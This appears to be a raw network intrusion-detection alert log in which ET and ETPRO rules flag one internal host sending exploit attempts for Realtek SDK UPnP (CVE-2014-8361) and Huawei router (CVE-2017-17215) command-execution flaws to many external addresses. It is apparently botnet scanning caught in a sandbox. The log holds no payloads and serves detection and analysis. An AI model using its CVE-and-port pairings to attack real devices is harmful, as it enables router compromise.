                                                07/20/24-23:06:12.623995TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3564252869192.168.2.14114.59.223.176
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004637215192.168.2.14157.233.107.21
                                                07/20/24-23:06:41.550251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25287052869192.168.2.1452.30.74.250
                                                07/20/24-23:05:37.456840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25946252869192.168.2.1459.165.217.161
                                                07/20/24-23:05:59.967879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3850452869192.168.2.14200.129.145.85
                                                07/20/24-23:05:38.771024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4818452869192.168.2.1451.39.86.197
                                                07/20/24-23:05:35.422821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4557652869192.168.2.14173.175.30.8
                                                07/20/24-23:06:32.467103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615091852869192.168.2.1488.196.89.109
                                                07/20/24-23:05:57.958012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615778252869192.168.2.14172.65.163.145
                                                07/20/24-23:05:58.911568TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5902252869192.168.2.1478.187.239.16
                                                07/20/24-23:06:15.027910TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615325652869192.168.2.14158.132.102.172
                                                07/20/24-23:06:19.756250TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615661252869192.168.2.14189.135.163.53
                                                07/20/24-23:06:08.320378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614473252869192.168.2.1436.120.66.242
                                                07/20/24-23:05:48.821008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528237215192.168.2.14198.167.54.50
                                                07/20/24-23:06:02.325373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365852869192.168.2.14147.154.255.30
                                                07/20/24-23:06:23.323671TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23555452869192.168.2.14153.95.32.34
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364037215192.168.2.14197.223.52.137
                                                07/20/24-23:05:40.334659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5623252869192.168.2.14192.79.124.241
                                                07/20/24-23:05:39.685214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233237215192.168.2.14197.44.206.131
                                                07/20/24-23:05:40.325934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794052869192.168.2.14175.146.247.15
                                                07/20/24-23:05:36.526908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070837215192.168.2.14142.240.55.156
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527637215192.168.2.1441.152.104.71
                                                07/20/24-23:06:14.553922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5011852869192.168.2.14140.195.204.208
                                                07/20/24-23:06:08.993749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007837215192.168.2.14197.148.134.224
                                                07/20/24-23:05:39.055908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772437215192.168.2.14197.71.39.138
                                                07/20/24-23:06:02.122085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659852869192.168.2.1497.183.170.78
                                                07/20/24-23:05:37.590968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.14107.117.108.202
                                                07/20/24-23:05:37.447263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5547052869192.168.2.14183.59.191.208
                                                07/20/24-23:05:44.290090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3382652869192.168.2.1458.92.201.189
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.1441.51.127.171
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639837215192.168.2.14157.237.74.87
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717837215192.168.2.1483.164.28.229
                                                07/20/24-23:05:45.735784TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615769252869192.168.2.1444.15.121.137
                                                07/20/24-23:05:37.449068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4341452869192.168.2.14103.132.88.33
                                                07/20/24-23:06:16.535822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721052869192.168.2.1497.53.99.115
                                                07/20/24-23:05:34.659618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740837215192.168.2.14109.251.14.201
                                                07/20/24-23:06:01.139544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4974052869192.168.2.14190.242.197.218
                                                07/20/24-23:05:52.445659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299652869192.168.2.148.108.202.123
                                                07/20/24-23:05:40.369944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3981052869192.168.2.1454.215.17.180
                                                07/20/24-23:05:58.233115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507852869192.168.2.14213.153.92.60
                                                07/20/24-23:05:36.577316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414237215192.168.2.14144.175.143.141
                                                07/20/24-23:05:33.828884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759437215192.168.2.14197.209.199.16
                                                07/20/24-23:05:37.560327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4924252869192.168.2.1431.247.190.180
                                                07/20/24-23:05:52.531304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23999052869192.168.2.14176.236.240.152
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079037215192.168.2.14197.1.140.249
                                                07/20/24-23:05:35.790631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3650252869192.168.2.1443.119.39.158
                                                07/20/24-23:05:59.031215TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23728452869192.168.2.1493.193.36.93
                                                07/20/24-23:07:03.257276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410452869192.168.2.1425.201.244.222
                                                07/20/24-23:05:37.476343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4972052869192.168.2.14130.207.23.122
                                                07/20/24-23:06:00.938217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23727652869192.168.2.14109.194.35.126
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751837215192.168.2.1441.172.33.196
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689637215192.168.2.1447.121.106.191
                                                07/20/24-23:06:00.018219TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25357452869192.168.2.14160.151.2.40
                                                07/20/24-23:05:45.435097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926037215192.168.2.14157.118.90.71
                                                07/20/24-23:06:07.983284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24252652869192.168.2.1431.38.158.120
                                                07/20/24-23:06:18.014309TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23974252869192.168.2.1460.241.94.226
                                                07/20/24-23:06:06.076249TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25382252869192.168.2.1485.100.3.106
                                                07/20/24-23:05:39.048997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508037215192.168.2.14157.246.104.242
                                                07/20/24-23:06:00.209942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5458252869192.168.2.14103.198.111.177
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14157.234.135.232
                                                07/20/24-23:05:37.487251TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23794052869192.168.2.1443.119.39.158
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127437215192.168.2.14157.117.255.125
                                                07/20/24-23:05:56.066947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804237215192.168.2.14197.64.2.7
                                                07/20/24-23:05:37.648285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4931252869192.168.2.1468.40.200.159
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462637215192.168.2.1414.88.135.161
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229837215192.168.2.14197.180.179.125
                                                07/20/24-23:06:02.672606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614685652869192.168.2.1468.185.233.236
                                                07/20/24-23:06:29.663319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3526452869192.168.2.1474.28.251.113
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985637215192.168.2.1418.9.43.125
                                                07/20/24-23:05:37.469321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699252869192.168.2.14184.126.92.19
                                                07/20/24-23:05:46.401351TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3321852869192.168.2.1498.101.208.247
                                                07/20/24-23:05:57.832966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5658052869192.168.2.14187.11.67.4
                                                07/20/24-23:06:07.332948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5315252869192.168.2.14126.244.253.92
                                                07/20/24-23:05:48.808887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054037215192.168.2.1441.180.40.88
                                                07/20/24-23:06:00.516920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675652869192.168.2.14180.44.235.174
                                                07/20/24-23:06:01.996850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3626052869192.168.2.14138.178.254.97
                                                07/20/24-23:06:09.106479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5563252869192.168.2.14197.171.226.89
                                                07/20/24-23:05:36.328640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350637215192.168.2.14197.245.143.226
                                                07/20/24-23:05:45.759654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614942052869192.168.2.1436.229.223.206
                                                07/20/24-23:05:57.017539TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25502452869192.168.2.14196.217.33.59
                                                07/20/24-23:05:57.181822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3438652869192.168.2.144.4.30.157
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652037215192.168.2.14197.157.247.234
                                                07/20/24-23:05:45.439167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440837215192.168.2.14197.16.145.88
                                                07/20/24-23:05:37.462705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25469252869192.168.2.14141.231.43.221
                                                07/20/24-23:06:04.575032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5522852869192.168.2.14124.220.109.211
                                                07/20/24-23:05:35.725561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615886452869192.168.2.1493.244.188.64
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973837215192.168.2.14197.206.48.74
                                                07/20/24-23:06:12.509551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3703652869192.168.2.1480.173.4.192
                                                07/20/24-23:06:21.143883TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23606452869192.168.2.14154.27.63.24
                                                07/20/24-23:05:38.578706TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3370652869192.168.2.14206.209.134.255
                                                07/20/24-23:05:59.400252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5598852869192.168.2.14175.190.32.228
                                                07/20/24-23:06:12.609835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3478252869192.168.2.14128.104.3.159
                                                07/20/24-23:05:40.361541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5806652869192.168.2.1473.202.31.82
                                                07/20/24-23:06:01.997543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4590652869192.168.2.1465.77.245.190
                                                07/20/24-23:06:02.925501TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613966252869192.168.2.1464.150.182.18
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14136.230.51.161
                                                07/20/24-23:05:35.473003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615150452869192.168.2.14205.35.169.26
                                                07/20/24-23:05:37.496382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23518852869192.168.2.14170.98.124.78
                                                07/20/24-23:05:35.891482TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614753252869192.168.2.14206.53.82.225
                                                07/20/24-23:05:58.383835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5980452869192.168.2.14134.176.234.249
                                                07/20/24-23:05:50.559359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.14157.204.22.38
                                                07/20/24-23:05:39.055908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14157.215.22.6
                                                07/20/24-23:05:57.137886TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25884252869192.168.2.14178.246.89.184
                                                07/20/24-23:05:58.240695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3509252869192.168.2.14155.70.176.109
                                                07/20/24-23:06:00.224203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069652869192.168.2.14199.28.141.22
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938037215192.168.2.1441.185.62.167
                                                07/20/24-23:06:13.620376TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613497452869192.168.2.14204.40.227.89
                                                07/20/24-23:05:42.245949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068837215192.168.2.1441.198.19.141
                                                07/20/24-23:05:58.972089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758052869192.168.2.14139.91.195.69
                                                07/20/24-23:05:42.145992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423637215192.168.2.14157.197.122.190
                                                07/20/24-23:06:08.078658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4259452869192.168.2.149.99.224.142
                                                07/20/24-23:05:52.557906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5034452869192.168.2.1414.207.98.101
                                                07/20/24-23:05:57.159827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613695252869192.168.2.1492.72.166.156
                                                07/20/24-23:06:25.934160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5907852869192.168.2.14140.104.123.65
                                                07/20/24-23:05:57.179441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4311052869192.168.2.14119.6.68.125
                                                07/20/24-23:05:59.472881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5068452869192.168.2.1497.30.113.63
                                                07/20/24-23:06:03.170667TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615767252869192.168.2.14145.15.157.98
                                                07/20/24-23:06:14.277885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321252869192.168.2.14137.66.165.24
                                                07/20/24-23:05:57.173548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4497452869192.168.2.14134.45.103.79
                                                07/20/24-23:05:40.442605TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23833252869192.168.2.1462.189.116.240
                                                07/20/24-23:05:40.423413TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26008852869192.168.2.14218.43.11.190
                                                07/20/24-23:05:50.510455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288837215192.168.2.14157.68.23.170
                                                07/20/24-23:06:05.981181TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25083852869192.168.2.1414.164.85.37
                                                07/20/24-23:05:40.440618TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25451452869192.168.2.14154.217.235.162
                                                07/20/24-23:05:52.589392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23363452869192.168.2.1476.37.36.156
                                                07/20/24-23:05:57.797060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264052869192.168.2.145.36.215.241
                                                07/20/24-23:06:01.368197TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24082452869192.168.2.14210.197.231.89
                                                07/20/24-23:05:39.947686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614634252869192.168.2.14194.209.238.48
                                                07/20/24-23:05:52.527430TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25986252869192.168.2.1457.134.107.229
                                                07/20/24-23:05:59.106017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5499052869192.168.2.14194.102.249.55
                                                07/20/24-23:05:39.685214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262837215192.168.2.14157.182.235.28
                                                07/20/24-23:05:57.558741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613416852869192.168.2.14114.51.118.233
                                                07/20/24-23:05:58.383835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5559052869192.168.2.14203.38.123.229
                                                07/20/24-23:07:04.068388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614811652869192.168.2.1443.57.191.27
                                                07/20/24-23:07:07.975226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613717652869192.168.2.1472.33.167.45
                                                07/20/24-23:06:17.237965TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613325052869192.168.2.14201.236.226.231
                                                07/20/24-23:05:38.452869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615949452869192.168.2.1424.160.46.49
                                                07/20/24-23:05:57.029235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24760452869192.168.2.1498.81.150.61
                                                07/20/24-23:05:44.975364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4929852869192.168.2.14166.212.7.50
                                                07/20/24-23:05:42.238265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998637215192.168.2.14157.19.177.243
                                                07/20/24-23:05:36.001304TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613688052869192.168.2.14208.117.82.120
                                                07/20/24-23:06:02.853581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614313252869192.168.2.14147.212.209.81
                                                07/20/24-23:07:03.123324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615025252869192.168.2.14119.157.54.136
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.14157.46.30.204
                                                07/20/24-23:06:30.428451TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614009452869192.168.2.14171.119.105.56
                                                07/20/24-23:07:07.975226TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25169052869192.168.2.14189.26.184.105
                                                07/20/24-23:06:31.652096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6084452869192.168.2.1464.149.50.144
                                                07/20/24-23:05:45.543285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503052869192.168.2.1452.34.41.29
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357837215192.168.2.14197.101.55.74
                                                07/20/24-23:05:37.497829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25246052869192.168.2.14132.253.188.42
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979237215192.168.2.14192.84.129.146
                                                07/20/24-23:05:56.450231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3580252869192.168.2.14177.22.170.108
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561837215192.168.2.145.36.73.89
                                                07/20/24-23:05:36.299648TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613807452869192.168.2.1425.145.229.184
                                                07/20/24-23:06:11.320571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4628252869192.168.2.142.174.24.244
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714637215192.168.2.14157.205.21.89
                                                07/20/24-23:06:12.648653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615139852869192.168.2.14202.180.182.96
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423037215192.168.2.14157.18.39.4
                                                07/20/24-23:05:58.592016TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23456052869192.168.2.14156.132.102.218
                                                07/20/24-23:05:38.634552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614138452869192.168.2.1438.198.246.87
                                                07/20/24-23:06:56.125524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4399852869192.168.2.14212.160.189.111
                                                07/20/24-23:05:57.558741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614700052869192.168.2.1468.28.176.54
                                                07/20/24-23:06:26.174884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5110452869192.168.2.14148.83.111.89
                                                07/20/24-23:05:33.859779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14197.206.89.130
                                                07/20/24-23:06:00.620653TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613659652869192.168.2.14130.148.196.29
                                                07/20/24-23:06:01.188343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5489652869192.168.2.1499.203.53.121
                                                07/20/24-23:05:47.487816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615382252869192.168.2.1413.4.78.44
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437037215192.168.2.14157.21.213.253
                                                07/20/24-23:06:01.105390TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24351452869192.168.2.14179.59.38.175
                                                07/20/24-23:05:42.257817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410837215192.168.2.14157.158.149.99
                                                07/20/24-23:05:35.530121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6045852869192.168.2.1470.127.37.49
                                                07/20/24-23:05:40.416273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3965452869192.168.2.1451.81.161.20
                                                07/20/24-23:07:06.283236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5714652869192.168.2.1482.48.155.202
                                                07/20/24-23:05:58.968542TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24993852869192.168.2.14129.7.141.158
                                                07/20/24-23:05:37.442743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23533252869192.168.2.14189.230.165.186
                                                07/20/24-23:06:35.414252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4434252869192.168.2.14167.66.48.216
                                                07/20/24-23:06:05.839926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615696252869192.168.2.14162.255.243.82
